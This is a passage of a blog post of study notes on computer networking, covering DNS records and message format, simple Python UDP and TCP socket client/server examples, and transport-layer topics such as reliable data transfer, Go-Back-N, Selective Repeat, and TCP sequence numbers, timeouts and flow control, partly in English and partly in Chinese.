protocol that lets hosts query that distributed database.</li></ul></li><li><p>Services provided by DNS</p><ul><li><p><strong>Hostname-to-IP-address translation</strong></p></li><li><p><strong>Host aliasing</strong>: a host with a complicated hostname can have one or more aliases.</p><p>For example, a host named <code>relay1.west-coast.enterprise.com</code> might have the two aliases <code>enterprise.com</code> and <code>www.enterprise.com</code>. In that case <code>relay1.west-coast.enterprise.com</code> is called the <strong>canonical hostname</strong>. Aliases are easier to remember than canonical hostnames.</p></li><li><p><strong>Mail server aliasing</strong>: a mail application can invoke DNS to resolve a supplied alias and obtain the host's canonical hostname and its IP address.</p></li><li><p><strong>Load distribution</strong>: DNS is also used to distribute load among replicated servers.</p></li></ul></li><li><p>Overview of how DNS works</p><ul><li><p>A distributed, hierarchical database</p><ul><li>To deal with scale, DNS uses a large number of DNS servers organized hierarchically.</li><li>There are three classes of DNS server<ul><li><strong>Root DNS servers</strong>: provide the IP addresses of the TLD servers.</li><li><strong>Top-level domain (TLD) DNS servers</strong>: every top-level domain (com, org, net and so on) and every country top-level domain (uk, fr and so on) has TLD servers. TLD servers provide the IP addresses of authoritative DNS servers.</li><li><strong>Authoritative DNS servers</strong>: every organization with publicly accessible hosts on the Internet must provide publicly accessible DNS records that map the names of those hosts to IP addresses. The organization's authoritative DNS server holds these records.</li></ul></li></ul><p><img src="/2021/05/cnatda-1/image-20210508203109038.png" alt="image-20210508203109038"></p><ul><li><p>Local DNS server: strictly speaking it is not part of the DNS server hierarchy. It acts as a proxy, forwarding DNS queries into the hierarchy.</p><p>There are two kinds of DNS query: <strong>recursive</strong> and <strong>iterative</strong>.</p><ul><li><p>Iterative query</p><p><img 
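src="/2021/05/cnatda-1/image-20210508204520770.png" alt="image-20210508204520770"></p></li><li><p>Recursive query</p><p><img src="/2021/05/cnatda-1/image-20210508204559893.png" alt="image-20210508204559893"></p></li></ul></li></ul></li><li><p>DNS caching</p><ul><li><p>How it works: when a DNS server receives a DNS reply, it can cache the mapping in its local memory.</p><p>If a hostname/IP address pair is cached in a DNS server and another query for the same hostname arrives, the server can supply the requested IP address even though it is not authoritative for that hostname.</p></li><li><p>Because hosts and the mappings between hostnames and IP addresses are not permanent, DNS servers discard cached information after a period of time.</p></li><li><p>A local DNS server can also cache the IP addresses of TLD servers, which lets it bypass the root DNS servers in the query chain. Thanks to caching, the <strong>root servers</strong> are bypassed for all but a small fraction of DNS queries.</p></li></ul></li></ul></li><li><p>DNS records and messages</p><ul><li><p>The DNS servers that together implement the distributed database store <strong>resource records (Resource Record, RR)</strong>, which provide the hostname-to-IP-address mappings. Each DNS reply message carries one or more resource records.</p></li><li><p>A resource record is a 4-tuple with the following fields: <strong>(Name, Value, Type, TTL)</strong></p><p>TTL is the record's time to live; it determines <strong>when the resource record should be removed from a cache</strong>.</p><p>The meaning of Name and Value depends on Type:</p><ul><li><p>If Type = A, Name is a hostname and Value is the IP address for that hostname. A Type A record thus provides the standard hostname-to-IP-address mapping. For example <strong>(<a href="http://relay1.bar.foo.com">relay1.bar.foo.com</a>, 145.37.93.126, A)</strong></p></li><li><p>If Type = NS, Name is a domain (such as <code>foo.com</code>) and Value is the hostname of an authoritative DNS server that knows how to obtain the IP addresses of hosts in that domain. This record is used to route DNS queries further along the query chain. For example <strong>(<a href="http://foo.com">foo.com</a>, <a href="http://dns.foo.com">dns.foo.com</a>, NS)</strong></p></li><li><p>If Type = CNAME, Value is the canonical hostname for the alias hostname Name. This record gives a querying host the canonical name for a hostname. For example <strong>(<a href="http://foo.com">foo.com</a>, <a href="http://relay1.bar.foo.com">relay1.bar.foo.com</a>, CNAME)</strong></p></li><li><p>If Type = MX, Value is the <strong>canonical hostname of a mail server</strong> whose alias is Name. For example <strong>(<a href="http://foo.com">foo.com</a>, <a href="http://mail.bar.foo.com">mail.bar.foo.com</a>, 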
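MX)</strong>. MX records allow mail server hostnames to have simple aliases.</p><blockquote><p>Note: with MX records, a company's mail server and one of its other servers (such as its Web server) can share <strong>the same alias</strong>. To obtain the canonical hostname of the mail server, a DNS client requests an MX record; to obtain the canonical hostname of the other server, it requests a CNAME record.</p></blockquote></li></ul><p>If a DNS server is the <strong>authoritative DNS server</strong> for a particular hostname, it holds <strong>a Type A record for that hostname</strong>.</p><p>If a server is not authoritative for a hostname, it holds <strong>a Type NS record</strong> for the domain that contains the hostname, together with <strong>a Type A record</strong> that provides <strong>the IP address of the DNS server named in the Value field of the NS record</strong>.</p></li><li><p>The DNS message format is shown below. There are only two kinds of message, query and reply, and both have the same format:</p><p><img src="/2021/05/cnatda-1/image-20210509000647692.png" alt="image-20210509000647692"></p><ul><li>The first 12 bytes are the <strong>header section</strong>, which has several fields.<ul><li>The first field (the identifier) is a 16-bit number that identifies the query. It is copied into the reply so that the client can match received replies with the queries it sent.</li><li>The flags field contains a number of flags.<ul><li>A 1-bit <strong>query/reply</strong> flag indicates whether the message is a <strong>query (0)</strong> or a <strong>reply (1)</strong>.</li><li>A 1-bit <strong>authoritative</strong> flag is set in a reply when the DNS server is authoritative for the queried name.</li><li>A 1-bit <strong>recursion-desired</strong> flag is set when the client wants the DNS server to perform a <strong>recursive</strong> query if it does not have the record. If the server supports recursion, it sets the 1-bit <strong>recursion-available</strong> flag in the reply.</li></ul></li></ul></li><li>The <strong>question section</strong> describes the query being made. It includes<ul><li>a name field, containing the name being queried, and</li><li>a type field, indicating the type of question being asked about the name, for example a host address associated with the name (Type A) or the mail server for the name (Type MX).</li></ul></li><li>In a reply from a DNS server, the <strong>answer section</strong> contains the resource records for the name originally queried. The answer section can hold several RRs, because <strong>a hostname can have multiple IP addresses, as with load balancing</strong>.</li><li>The <strong>authority section</strong> contains records for other authoritative servers.</li><li>The <strong>additional section</strong> contains other helpful records. For example, the answer section of a reply to an MX query contains a resource record giving the canonical hostname of a mail server, and the additional section <strong>contains a Type A record</strong> providing <strong>the IP address for that canonical hostname</strong>.</li></ul></li></ul></li></ul><h3 id="3-套接字编程">3. Socket programming</h3><h4 id="a-UDP编程">a. 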
UDP programming</h4><p><img src="/2021/05/cnatda-1/image-20210508165739385.png" alt="image-20210508165739385"></p><ul><li><p><code>UDPClient.py</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> socket <span class="keyword">import</span> *</span><br><span class="line">serverName = <span class="string">&#x27;hostname&#x27;</span></span><br><span class="line">serverPort = <span class="number">12000</span></span><br><span class="line">clientSocket = socket(AF_INET, SOCK_DGRAM)</span><br><span class="line">message = <span class="built_in">input</span>(<span class="string">&#x27;Input lowercase sentence:&#x27;</span>)</span><br><span class="line">clientSocket.sendto(message.encode(), (serverName, serverPort))</span><br><span class="line">modifiedMessage, serverAddress = clientSocket.recvfrom(<span class="number">2048</span>)</span><br><span class="line"><span class="built_in">print</span>(modifiedMessage.decode())</span><br><span class="line">clientSocket.close()</span><br></pre></td></tr></table></figure></li><li><p><code>UDPServer.py</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> socket <span class="keyword">import</span> *</span><br><span class="line">serverPort = <span class="number">12000</span></span><br><span 
class="line">serverSocket = socket(AF_INET, SOCK_DGRAM)</span><br><span class="line">serverSocket.bind((<span class="string">&#x27;&#x27;</span>, serverPort))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;The server is ready to receive&quot;</span>)</span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    message, clientAddress = serverSocket.recvfrom(<span class="number">2048</span>)</span><br><span class="line">    modifiedMessage = message.decode().upper()</span><br><span class="line">    serverSocket.sendto(modifiedMessage.encode(), clientAddress)</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-TCP编程">b. TCP programming</h4><p><img src="/2021/05/cnatda-1/image-20210508165807956.png" alt="image-20210508165807956"></p><ul><li><p><code>TCPClient.py</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> socket <span class="keyword">import</span> *</span><br><span class="line">serverName = <span class="string">&#x27;servername&#x27;</span></span><br><span class="line">serverPort = <span class="number">12000</span></span><br><span class="line">clientSocket = socket(AF_INET, SOCK_STREAM)</span><br><span class="line">clientSocket.connect((serverName, serverPort))</span><br><span class="line">sentence = <span class="built_in">input</span>(<span class="string">&#x27;Input lowercase sentence:&#x27;</span>)</span><br><span class="line">clientSocket.send(sentence.encode())</span><br><span class="line">modifiedSentence = clientSocket.recv(<span 
class="number">1024</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;From Server: &#x27;</span>, modifiedSentence.decode())</span><br><span class="line">clientSocket.close()</span><br></pre></td></tr></table></figure></li><li><p><code>TCPServer.py</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> socket <span class="keyword">import</span> *</span><br><span class="line">serverPort = <span class="number">12000</span></span><br><span class="line">serverSocket = socket(AF_INET, SOCK_STREAM)</span><br><span class="line">serverSocket.bind((<span class="string">&#x27;&#x27;</span>, serverPort))</span><br><span class="line">serverSocket.listen(<span class="number">1</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;The server is ready to receive&quot;</span>)</span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    connectionSocket, addr = serverSocket.accept()</span><br><span class="line">    sentence = connectionSocket.recv(<span class="number">1024</span>).decode()</span><br><span class="line">    capitalizedSentence = sentence.upper()</span><br><span class="line">    connectionSocket.send(capitalizedSentence.encode())</span><br><span class="line">    connectionSocket.close()</span><br></pre></td></tr></table></figure></li></ul><h2 id="第三章：运输层">Chapter 3: Transport Layer</h2><h3 id="1-简述">1. 
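Overview</h3><ul><li><p>A transport-layer protocol provides <strong>logical communication</strong> between application processes running on different hosts. From the application's point of view, logical communication makes it look as if the hosts running the processes were directly connected.</p></li><li><p>TCP and UDP are both transport-layer protocols, but they are <strong>not the only ones</strong>.</p></li><li><p>A transport-layer TCP/UDP packet is called a <strong>segment</strong>, and a network-layer packet is called a <strong>datagram</strong>.</p></li><li><p>One of the Internet's network-layer protocols is the <strong>Internet Protocol (IP)</strong>. Its service model is a <strong>best-effort delivery service</strong>, which is why it is called an <strong>unreliable service</strong>. Every host has at least one network-layer address, its IP address.</p></li><li><p>Extending host-to-host delivery to process-to-process delivery is called <strong>transport-layer multiplexing and demultiplexing</strong>.</p><ul><li><p>Delivering the data in a transport-layer segment to the correct socket is called <strong>demultiplexing</strong>.</p></li><li><p>Gathering data chunks from different sockets, encapsulating each chunk with header information to create segments, and passing the segments to the network layer is called <strong>multiplexing</strong>.</p></li><li><p>Transport-layer multiplexing requires that</p><ul><li>sockets have unique identifiers, and</li><li>each segment has special fields that indicate the socket to which the segment is to be delivered. These are typically the <strong>source port number field</strong> and the <strong>destination port number field</strong> (along with some other fields).</li></ul></li><li><p>How the transport layer performs demultiplexing</p><ul><li>When a segment arrives at the host, the transport layer examines the destination port number in the segment and directs the segment to the corresponding socket.</li><li>The data in the segment then passes through the socket into the attached process.</li></ul></li><li><p><strong>Connectionless</strong> multiplexing and demultiplexing</p><p>A UDP socket is fully identified by a <strong>two-tuple</strong> consisting of a <strong>destination IP address</strong> and a <strong>destination port number</strong>.</p><p>So if two UDP segments have different source IP addresses or source port numbers but the same destination IP address and destination port number, both segments are directed to the same destination process through the same destination socket.</p></li><li><p><strong>Connection-oriented</strong> multiplexing and demultiplexing</p><p>A TCP socket is identified by a <strong>four-tuple (source IP address, source port number, destination IP address, destination port number)</strong>.</p><p>Two arriving TCP segments with different source IP addresses or source port numbers are directed to two different sockets.</p></li></ul></li></ul><h3 id="2-无连接运输：UDP">2. 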
无连接运输：<strong>UDP</strong></h3><ul><li><p>UDP优点</p><ul><li><strong>关于发送什么数据以及何时发送的应用层控制更为精细</strong>。与受拥塞控制机制约束的TCP不同，UDP会<strong>立即</strong>将应用层的数据打包并<strong>立即</strong>传递给网络层。</li><li><strong>无需连接建立</strong>。UDP无需三次握手，不需要任何准备即可进行数据传输，因此不会引入建立连接的时延。</li><li><strong>无连接状态</strong>。TCP需要在端系统中维护连接状态，此连接状态中包括接收和发送缓存、拥塞控制参数以及序号与确认号的参数。而UDP不维护连接状态，因此不跟踪这些参数，就可以支持更多活跃客户。</li><li><strong>分组首部开销小</strong>。每个TCP报文段都有至少20字节的首部开销，而UDP仅有8字节的开销。</li></ul></li><li><p>UDP报文段结构</p><p><img src="/2021/05/cnatda-1/image-20210508163648687.png" alt="image-20210508163648687"></p></li><li><p>UDP提供差错检测功能：发送方的UDP对报文段中的所有16比特字的<strong>和</strong>进行<strong>反码运算</strong>。求和时遇到的任何溢出都将被回卷。得到的结果被放在UDP报文段中的检验和字段。</p><blockquote><p>回卷：把溢出的最高位1和低16位做加法运算。</p></blockquote><p>这样，接收方将全部的16比特字（包括检验和字段）相加，如果分组没有引入差错，则在接收方处该和将为1111111111111111。如果存在任意一个位置的比特为0，则说明该分组中出现差错。</p></li></ul><h3 id="3-可靠数据传输">3. 可靠数据传输</h3><h4 id="1-构建可靠传输数据协议">1. 构建可靠传输数据协议</h4><ul><li><p><strong>可靠数据传输</strong>为上层实体提供的服务抽象是：数据可以通过一条可靠的信道进行传输。借助于可靠信道，传输数据比特就不会受到损坏或丢失，并且所有数据都是按照其发送顺序进行交付。</p><p>实现这种服务抽象是<strong>可靠数据传输协议</strong>的责任，但通常该协议的<strong>下层</strong>协议是<strong>不可靠</strong>的，因此任务较为复杂。</p><blockquote><p>例如：TCP是在不可靠的（IP）端到端网络层之上实现的可靠数据传输协议。</p></blockquote></li><li><p>底层信道在分组的传输或缓存的过程中，可能会产生比特差错。为此，接收方需要向发送方返回<strong>肯定确认</strong>或<strong>否定确认</strong>的控制报文，使发送方知道哪些内容被正确接收，哪些内容接收有误并因此需要重传；发送方在得知出错后重传对应的分组。在计算机网络中，基于这样<strong>重传机制</strong>的<strong>可靠数据传输协议</strong>称为<strong>自动重传请求（Automatic Repeat reQuest, ARQ）</strong>。</p><p>更重要的是，ARQ协议还需要另外三种协议功能来处理存在比特差错的情况：</p><ul><li><strong>差错检测</strong>。需要一种机制以使接收方检测到何时出现了比特差错。这里使用<strong>检验和等差错检测技术</strong>（想想UDP检验和）。</li><li><strong>接收方反馈</strong>。由于发送方和接收方通常在不同的端系统上运行，因此发送方要了解接收方情况的唯一途径是<strong>让接收方提供明确的反馈信息给发送方</strong>。口述报文中的<strong>肯定确认ACK</strong>和<strong>否定确认NAK</strong>就是这种反馈的例子。</li><li><strong>重传</strong>。接收方收到有差错的分组时，发送方将重传该分组。</li></ul><p>需要注意的是，接收方返回的 ACK/NAK 报文同样有受损或丢包的风险。当发送方收到含糊的 ACK/NAK 
分组时，只需重传分组即可，但这会在信道中引入<strong>冗余分组</strong>。冗余分组的困难点在于，接收方无法<strong>事先</strong>知道接收到的分组是新的还是一次重传。</p><p>解决这个问题的一个简单方法是：在数据分组中添加一新字段，让发送方对其数据分组编号，即将发送数据分组的<strong>序号</strong>放在该字段，之后接收方只需检查序号即可确定收到的分组是否是一次重传。</p></li><li><p>除了比特受损以外，底层信道还会丢包。因此可靠数据传输协议必须处理另外两个问题：<strong>如何检测丢包</strong> &amp; <strong>发生丢包后该做什么</strong>。根据上文，我们可以很容易地给出后一个问题的答案——<strong>重传</strong>。但对于第一个问题<strong>如何检测丢包</strong>，我们需要进一步研究一下。</p><p>发送方等待足够长的时间以<strong>确定</strong>分组是否已经丢失。实践中发送方根据特定算法选择一个时间值，以<strong>判定</strong>是否丢包（注意是<strong>判定</strong>不是<strong>确保</strong>）。如果在这个时间内没有收到ACK则重传该分组。</p><blockquote><p>需要注意的是，如果一个分组经历特别大的时延，发送方就可能重新发送该分组，即便原分组和其ACK都没有丢失。而这种情况就引入了<strong>冗余数据分组</strong>。</p></blockquote><p>为了实现基于时间的重传机制，需要一个<strong>倒计时定时器</strong>，在一个给定的时间量过期后，中断发送方，使其重传。</p></li><li><p>最终，实现的可靠传输数据协议的状态机图如下所示：</p><p><img src="/2021/05/cnatda-1/image-20210514200231320.png" alt="image-20210514200231320"></p><p>这里同样有一个图说明运行时可能产生的各类情况：</p><p><img src="/2021/05/cnatda-1/image-20210514200835917.png" alt="image-20210514200835917"></p><p>在<strong>检验和</strong>、<strong>序号</strong>、<strong>定时器</strong>、<strong>肯定和否定确认分组</strong>这些技术中，每种机制都在可靠传输协议的运行中起到了必不可少的作用，它们组合起来才构成一个<strong>可靠传输数据协议</strong>。</p></li></ul><h4 id="2-流水线可靠传输数据协议">2. 
流水线可靠传输数据协议</h4><p>上文中所实现的可靠传输数据协议是一个<strong>停等</strong>协议，即只有确保<strong>接收方正常接收当前分组</strong>后，才会继续发送下一个分组。停等协议的性能极其低下，并且其信道利用率也非常的低，故<strong>允许发送方发送多个分组而无需等待确认</strong>是一个必然的选择。</p><p>由于许多从发送方向接收方输送的分组可以被看做是填充到一条流水线中，因此该技术称为<strong>流水线</strong>。流水线技术对可靠数据传输协议带来的影响如下：</p><ul><li>必须增加序号范围。因为每个输送中的分组必须有一个唯一的序号，并且或许有多个在输送中的未确认报文。</li><li>协议中的发送方和接收方两端也许不得不缓存多个分组。发送方至少要缓存那些已发送但没有确认的分组；接收方需要缓存那些已正确接收的分组。</li><li>所需序号范围和对缓冲的要求取决于数据传输协议如何处理丢失、损坏以及延时过大的分组。</li></ul><p>对于流水线的差错恢复有两种基本方法：<strong>回退N步（Go-Back-N, GBN）</strong>和<strong>选择重传（Selective Repeat, SR）</strong>。</p><h5 id="1-回退N步">1) 回退N步</h5><p>回退N步协议允许发送方发送多个分组而不需等待确认，但受限于在流水线中未确认的分组数不能超过某个最大允许数N。以下显示了发送方看到的GBN协议的序号范围：</p><blockquote><p>基序号：最早未确认分组的序号</p><p>下一个序号：最小未使用序号</p><p>N常被称为窗口长度，因此GBN协议称为滑动窗口协议。</p></blockquote><ul><li>$[0, base-1]$：已经发送并被确认的分组</li><li>$[base, nextseqnum-1]$：已经发送但未被确认的分组</li><li>$[nextseqnum, base+N-1]$：用于那些要被立即发送的分组</li><li>$[base+N, \infty)$：暂时不能被使用，直到移动窗口。</li></ul><p><img src="/2021/05/cnatda-1/image-20210514202515628.png" alt="image-20210514202515628"></p><p>GBN的发送方必须响应三种类型的事件：</p><ul><li><strong>上层调用</strong>。当上层调用 rdt_send 时，发送方首先检查发送窗口是否已满，如果未满则产生一个分组并发送。如果窗口已满则隐式指示上层该窗口已满。</li><li><strong>收到一个ACK</strong>。GBN协议中，对序号为n的分组的确认采取<strong>累积确认</strong>方式，表示接收方已正确接收到<strong>序号为n及其之前</strong>的所有分组。</li><li><strong>超时事件</strong>。定时器用于恢复数据或确认分组的丢失。如果出现超时，则发送方重传<strong>所有已发送但还未被确认过</strong>的分组。</li></ul><p>GBN的接收方动作较为简单：如果一个序号为n的分组被正确接收到，并且按序，则接收方为n发送一个ACK，并将该分组中的数据部分交付到上层。其他情况下则<strong>丢弃该分组</strong>并为<strong>最近按序接收的分组</strong>重新发送ACK。</p><p>以下是一个运行中的GBN流程图：</p><p><img src="/2021/05/cnatda-1/image-20210514204430755.png" alt="image-20210514204430755"></p><h5 id="2-选择重传">2) 选择重传</h5><p>GBN协议可能会重传许多<strong>本没必要重传的分组</strong>，从而影响性能。SR协议通过让发送方仅重传那些<strong>它怀疑在接收方出错的分组</strong>，从而避免了不必要的重传。这种个别的、按需的重传要求接收方<strong>逐个地确认</strong>正确接收的分组。</p><p>SR协议同样使用窗口长度N来限制流水线中未完成、未被确认的分组数。但与GBN不同的是，发送方可能已经收到了对窗口中某些分组的ACK。</p><p><img src="/2021/05/cnatda-1/image-20210514205328078.png" 
alt="image-20210514205328078"></p><p>SR接收方将确认一个正确接收的分组而不管其是否<strong>按序</strong>。失序的分组将被<strong>缓存</strong>直到所有的丢失分组全被收到为止，此时才可以将一批分组按序交付给上层。需要注意的是：接收方会<strong>重新确认</strong>（而不是<strong>忽略</strong>）已收到过的那些<strong>序号小于当前窗口基序号</strong>的分组，因为<strong>发送方和接收方的窗口不总是一致</strong>。</p><p>以下是出现丢包时SR操作的简单例子：</p><p><img src="/2021/05/cnatda-1/image-20210514205526638.png" alt="image-20210514205526638"></p><h4 id="3-可靠数据传输机制及其用途的总结">3. 可靠数据传输机制及其用途的总结</h4><ul><li><strong>检验和</strong>：用于检测在一个传输分组中的比特错误。</li><li><strong>定时器</strong>：用于超时/重传一个分组。</li><li><strong>序号</strong>：用于为从发送方流向接收方的数据分组按顺序进行编号。</li><li><strong>确认</strong>：接收方用于告诉发送方一个分组或一组分组已被正确地接收到了。</li><li><strong>否定确认</strong>：接收方用于告诉发送方某个分组未被正确地接收。</li><li><strong>窗口、流水线</strong>：发送方也许被限制仅发送那些序号落在一个指定范围内的分组。</li></ul><h3 id="4-面向连接的运输：TCP">4. 面向连接的运输：TCP</h3><ul><li><p>TCP被称为是面向连接的，因为在一个应用进程可以开始向另一个应用进程发送数据之前，这两个进程必须先相互发送某些预备报文段，以建立确保数据传输的参数，<strong>这个过程称为握手</strong>。连接的双方都将初始化与TCP连接相关的许多TCP状态变量。</p><blockquote><p>注意：TCP的连接，是一条逻辑连接，共同状态仅保留在两个通信端系统的TCP程序中。中间的网络元素不会维持TCP连接状态，它们看到的只是数据报，而不是连接。</p></blockquote><p>同时TCP还是<strong>全双工、点对点</strong>服务。</p></li><li><p>TCP 可从发送缓存中取出并放入报文段中的数据数量受限于<strong>最大报文段长度（Maximum Segment Size, MSS）</strong>。而MSS通常根据最初确定的由本地发送主机发送的<strong>最大链路层帧长度</strong>（即<strong>最大传输单元Maximum Transmission Unit, MTU</strong>）来设置。设置该MSS要保证<strong>一个TCP报文段加上TCP/IP首部长度</strong>将适合单个链路层帧。</p></li></ul><h4 id="a-TCP报文段结构">a. 
TCP<strong>报文段结构</strong></h4><p><img src="/2021/05/cnatda-1/image-20210514212456035.png" alt="image-20210514212456035"></p><ul><li><p><strong>源端口号</strong>和<strong>目的端口号</strong>：用于多路复用/分解来自或送到上层应用的数据。</p></li><li><p>32bit的<strong>序号</strong>字段和32bit的<strong>确认号</strong>字段。</p></li><li><p>16bit的<strong>接收窗口</strong>字段：用于流量控制，表示接收方愿意接受的字节数量。</p></li><li><p>4bit的<strong>首部长度</strong>字段：表示以32bit为单位的TCP首部长度。由于TCP选项字段的原因，TCP首部的长度是可变的。（通常情况下，选项字段为空，因此TCP首部的典型长度为20字节）。</p></li><li><p>可选与变长的<strong>选项字段</strong>。</p></li><li><p>8bit的<strong>标志</strong>字段</p><ul><li>ACK: 指示确认字段中的值是有效的。</li><li>RST、SYN、FIN：用于连接建立与拆除。</li><li>CWR、ECE：在明确拥塞通告中使用。</li><li>PSH：表示接收方应该<strong>立即将数据交给上层</strong>。</li><li>URG：表示报文段里存在着被发送端的上层实体置为<strong>紧急</strong>的数据。紧急数据的最后一个字节由16bit的紧急数据指针字段指出。当紧急数据存在并给出指向紧急数据尾指针的时候，TCP必须通知接收端的上层实体。</li></ul><blockquote><p>在实践中，PSH、URG和紧急数据指针并没有使用。</p></blockquote></li></ul><h4 id="b-序号和确认号">b. 序号和确认号</h4><ul><li><p>序号：TCP把数据看成一个<strong>无结构有序</strong>的字节流。序号建立在<strong>传送的字节流</strong>之上，而<strong>不是</strong>建立在传送的报文段的序列之上。因此<strong>一个报文段的序号是该报文段首字节的字节流编号</strong>。</p><p><img src="/2021/05/cnatda-1/image-20210514213733944.png" alt="image-20210514213733944"></p></li><li><p>确认号：TCP是全双工的，因此主机A在向主机B发送数据的同时，也可能会收到来自主机B的数据。从主机B到达的每个报文段中都有一个序号用于从B流向A的数据。<strong>主机A填写进报文段的确认号是主机A期望从主机B收到的下一字节的序号。</strong></p><p>因为TCP只确认该流中至第一个丢失字节为止的字节，因此TCP被称为提供<strong>累积确认</strong>。若TCP收到乱序的报文段，实践中最常用的做法是<strong>接收方保留失序的字节</strong>，并等待缺少的字节以填补该间隔。</p></li><li><p>一个简单例子如下所示：</p><p><img src="/2021/05/cnatda-1/image-20210514215113475.png" alt="image-20210514215113475"></p></li></ul><h4 id="c-往返时间的估计与超时">c. 
往返时间的估计与超时</h4><ul><li><p>TCP使用超时/重传机制来处理报文段的丢失问题。<strong>超时时间间隔长度</strong>必须大于该连接的<strong>往返时间(RTT)</strong>，即从一个报文段发出到它被确认的时间，否则会造成不必要的重传。</p></li><li><p>估计往返时间</p><ul><li><p>报文段的<strong>样本RTT</strong>（这里表示为SampleRTT）就是从某报文段被发出到对该报文段的确认被收到之间的时间量。大多数TCP的实现仅在某个时刻做一次SampleRTT测量，而不会为每次发送的报文段测量一个SampleRTT。</p></li><li><p>TCP维持一个 SampleRTT 均值（称为 EstimatedRTT），一旦获得一个新 SampleRTT 时，TCP就会根据下列公式来更新 EstimatedRTT：</p><p>$EstimatedRTT = (1 - \alpha) \cdot EstimatedRTT + \alpha \cdot SampleRTT$</p><blockquote><p>RFC 6298 中给出的 alpha 推荐值为 0.125。</p></blockquote></li><li><p>除了估算 RTT外，测量RTT的变化也是有价值的。RFC6298定义了RTT偏差 DevRTT，用于估算SampleRTT 一般会偏离 EstimatedRTT 的程度：</p><p>$DevRTT = (1 - \beta) \cdot DevRTT + \beta \cdot |SampleRTT - EstimatedRTT|$</p></li></ul></li><li><p>设置和管理重传超时间隔</p><p>超时间隔应当大于等于 EstimatedRTT，并留出一定的余量；当 SampleRTT 波动较大时余量应当更大，波动较小时余量应当更小。TCP 用 EstimatedRTT 和 DevRTT 来体现这一点，因此最终的间隔为：$TimeoutInterval = EstimatedRTT + 4 \cdot DevRTT$</p><blockquote><p>推荐初始的TimeoutInterval的值为1s。</p></blockquote></li></ul><h4 id="d-可靠数据传输">d. 可靠数据传输</h4><ul><li><p><strong>实现机制</strong>：该部分中具体实现机制的大部分细节与上文中的<strong>可靠数据传输协议</strong>相同。</p></li><li><p><strong>超时间隔加倍</strong>：每次TCP重传时都会将下一次的超时间隔设为先前值的两倍，而不是由EstimatedRTT和DevRTT推断出的值。</p></li><li><p><strong>快速重传</strong>：</p><ul><li><strong>冗余ACK的生成过程</strong>：当TCP接收方检测到了数据流中的间隔时（该间隔可能是报文段丢失或重新排序造成），它只会对已经接收到的最后一个按序字节数据进行重复确认（即产生一个冗余ACK）。</li><li><strong>验证丢包原因</strong>：由于发送方经常发送大量的报文段，如果一个报文段丢失则很有可能引发大量冗余ACK。如果TCP发送方接收到对相同数据的<strong>3个</strong>冗余ACK，则认为跟在这个已被确认过3次的报文段之后的报文段已经丢失。此时执行<strong>快速重传</strong>，在报文段定时器过期<strong>之前</strong>重传丢失的报文段。</li></ul></li><li><p>TCP差错恢复机制</p><ul><li><p>TCP确认是累积式的，正确接收但失序的报文段是<strong>不会</strong>被接收方<strong>逐个确认</strong>的。</p><blockquote><p>注意：不会被逐个确认<strong>不代表</strong>会被丢弃。</p></blockquote></li><li><p>TCP发送方仅需维持<strong>已发送过但未被确认的字节的最小序号</strong>和<strong>下一个要发送的字节的序号</strong>。</p></li><li><p>许多TCP实现会将正确接收但失序的报文段<strong>缓存</strong>起来。</p></li><li><p>对TCP提出的修改意见是<strong>选择确认</strong>。它允许TCP接收方有选择地确认失序报文段，而不是累积地确认最后一个正确接收的有序报文段。</p></li></ul><blockquote><p>TCP的差错恢复机制是 
GBN协议和SR协议的混合体。</p></blockquote></li></ul><h4 id="e-流量控制">e. 流量控制</h4><ul><li><p>TCP为应用程序提供<strong>流量控制</strong>服务以消除发送方使接收方缓存溢出的可能性。</p></li><li><p>TCP发送方也可能因为IP网络的拥塞而被遏制，这种形式的发送方的控制被称为<strong>拥塞控制</strong>。</p><blockquote><p>注意：拥塞控制和流量控制不同，需要区分开来。</p></blockquote></li><li><p>TCP通过让<strong>发送方</strong>维护一个称为<strong>接收窗口</strong>的变量来提供流量控制。接收窗口用于告诉<strong>发送方</strong>，<strong>当前接收方</strong>还有多少可用的缓存空间。TCP是全双工通信，在连接两端的发送方都各自维护一个接收窗口。</p><p><img src="/2021/05/cnatda-1/image-20210515000223929.png" alt="image-20210515000223929"></p><p>假设主机A通过一条TCP连接向主机B发送一个大文件。则主机B通过把当前的 <strong>接收窗口rwnd</strong> 值放入它发给主机A的报文段<strong>接收窗口字段</strong>中，通知主机A在该连接的缓存中还有多少可用空间。</p></li><li><p>还有一个问题：假设主机B的接收缓存已满，使得 rwnd = 0，并且主机B没有任何数据要发给主机A（这种假设是为了确保主机AB之间<strong>没有任何的分组通信</strong>）。由于TCP仅在有数据或确认要发送时才会向主机A发送报文段，因此当主机B上的应用进程清空缓存时，TCP并不会向主机A发送带有 rwnd 